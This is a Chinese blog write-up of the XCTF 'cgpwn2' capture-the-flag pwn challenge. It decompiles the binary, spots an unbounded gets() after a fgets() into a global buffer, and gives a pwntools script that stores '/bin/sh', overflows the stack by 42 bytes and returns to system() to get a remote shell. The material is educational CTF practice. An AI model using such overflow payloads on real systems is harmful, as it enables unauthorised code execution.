攻防世界pwn——cgpwn2

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量319 收藏 1
点赞数 1
分类专栏: PWN 文章标签: 系统安全 ubuntu 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/127704359
版权

分析

提示是字符串,那就应该是字符串漏洞。运行程序,第一个位置输入name的值,可以第二个位置进行溢出

checksec

 保护都关了,可以随便做栈溢出

IDA

有个特殊的函数pwn,里面有system

int pwn()
{
  return system("echo hehehe");
}

call system地址为x0804855A,system自己的地址是08048420

main里没什么特殊的,看到有调用hello()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  hello();
  puts("thank you");
  return 0;
}

看一下hello()

char *hello()
{
  __int16 *v0; // eax
  int v1; // ebx
  unsigned int v2; // ecx
  __int16 *v3; // eax
  __int16 s; // [esp+12h] [ebp-26h] BYREF
  int v6; // [esp+14h] [ebp-24h] BYREF

  v0 = &s;
  v1 = 30;
  if ( ((unsigned __int8)&s & 2) != 0 )
  {
    s = 0;
    v0 = (__int16 *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    *(_DWORD *)&v0[v2 / 2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0xFFFFFFFC) );
  v3 = &v0[v2 / 2];
  if ( (v1 & 2) != 0 )
    *v3++ = 0;
  if ( (v1 & 1) != 0 )
    *(_BYTE *)v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets((char *)&s);
}

有fgets,变量存入name,name地址是0x0804A080,利用这里进行溢出。溢出后返回地址修改成system()函数,内容用/bin/sh覆盖

exp

cyclic计算偏移是42

from pwn import *
p = remote('61.147.171.105', 50924)

payload=b'a'*42+p32(0x0804855A)+p32(0x0804A080)
# 或者是直接调system函数,而不是直接调call system
# payload=b'a'*42+p32(0x08048420)+p32(0)+p32(0x0804A080)
p.sendlineafter("name\n", '/bin/sh')
p.sendlineafter("here:\n",payload)
p.interactive()
Lyrisฅ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cgpwn2(xctf)
weixin_43868725的博客
05-06 361
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
攻防世界pwn-cgpwn2
a_silly_coder的博客
01-15 1442
下载文件后,首先检查保护: 随后将文件拖入ida,查看源码,在hello函数中,发现了如下代码 首先用安全的fgets输入了一个变量,接着用不安全的gets接收了一个变量,在此处可以确认是栈溢出,且溢出点就在此处。 开始寻找利用方式,发现了system函数 还缺一个"/bin/sh"字符串,找遍了代码,没有发现,但是由于此前可以有一个自己的输入,保存在name变量上,即可以自己手动输入"/bin/sh",自此,设计栈结构为: 开始编写脚本: from pwn imp...
攻防世界pwn新手练习(cgpwn2
BurYiA的博客
03-26 496
题目链接 分析 我们来看这道题,首先checksec并运行一下 可以看到是32位程序,有两个输入点,保护只有 NX。 接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西 这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数 很遗憾的是只有system函数而没有我们需要的shellco...
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 687
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
PWN做题笔记5-cgpwn2(已修订)
qq_40923256的博客
04-19 215
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 32位ELF文件 未开启ALSR 程序实现依次进行两次输入 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢出 由于pwn方法包含了system方法,因此属于ret2libc漏洞 又由于未提供/bin/sh字符串,需要通过向.bss存储的...
pwn学习笔记2】cgpwn2攻防世界新手pwn题)
weixin_45927195的博客
03-14 464
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
攻防世界 when_did_you_born
09-28 246
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
[攻防世界]cgpwn2
逆向萌新的博客
06-11 382
[攻防世界]cgpw2n
攻防世界 Pwn cgpwn2
MrTreebook的博客
12-12 614
攻防世界 Pwn cgpwn21.题目下载地址2.checksec分析3.IDA分析3.1.看一下溢出大小4.exp4.1.运行结果 1.题目下载地址 点击下载 2.checksec分析 只开启了NX保护,应该不会有太多障碍 直接进IDA看一下 3.IDA分析 main函数中有一个hello函数,我们直接看hello函数 可以看到第二个gets函数没有限制输入大小,很明显是栈溢出 再看看有没有其他后门函数 看到有一个pwn函数中调用了system 而且第一个gets函数输入的name正好是处于bs
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 364
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
攻防世界 cgpwn2
BengDouLove的博客
03-19 462
乍一看是个普通的溢出,但是没有给binsh字符串,我就想到bugku pwn4里面也是没有字符串,用的$0做字符串,也达到binsh的效果 可是一看只有$么得$0… 然后我就开动脑筋,这回还真没看别人的wp,自己想的,可喜可贺 我灵机一动,,前面输入名字是什么玩意,,点进去name一看在bss段上,,那不就可以找到了,他也没开pie 第一次输入/bin/sh不就完了,然后第二次溢出覆盖返回...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
pwn07.ret2syscall例题
11-11
ret2syscall例题
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
攻防世界-cgpwn2
qq_45771413的博客
04-23 246
查看保护 无栈保护,无PIE保护 IDA 两次输入,一个输入名字(限制了输入长度),一个输入信息(gets可以作栈溢出) 解题思路 shift+f12查找字符串并没有发现/bin/sh,可能需要自己整,或者藏在某个变量里 在找_system函数的过程中,发现了pwn命名的函数,进入发现有system调用,第一次做的时候看到system就乐了,直接溢出s,然后跳转到pwn地址,结果真就只有 hehehe …… 估计这是出题人的恶趣味…… 后来我在函数列表里找到了真正的_system,括号内的comma
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值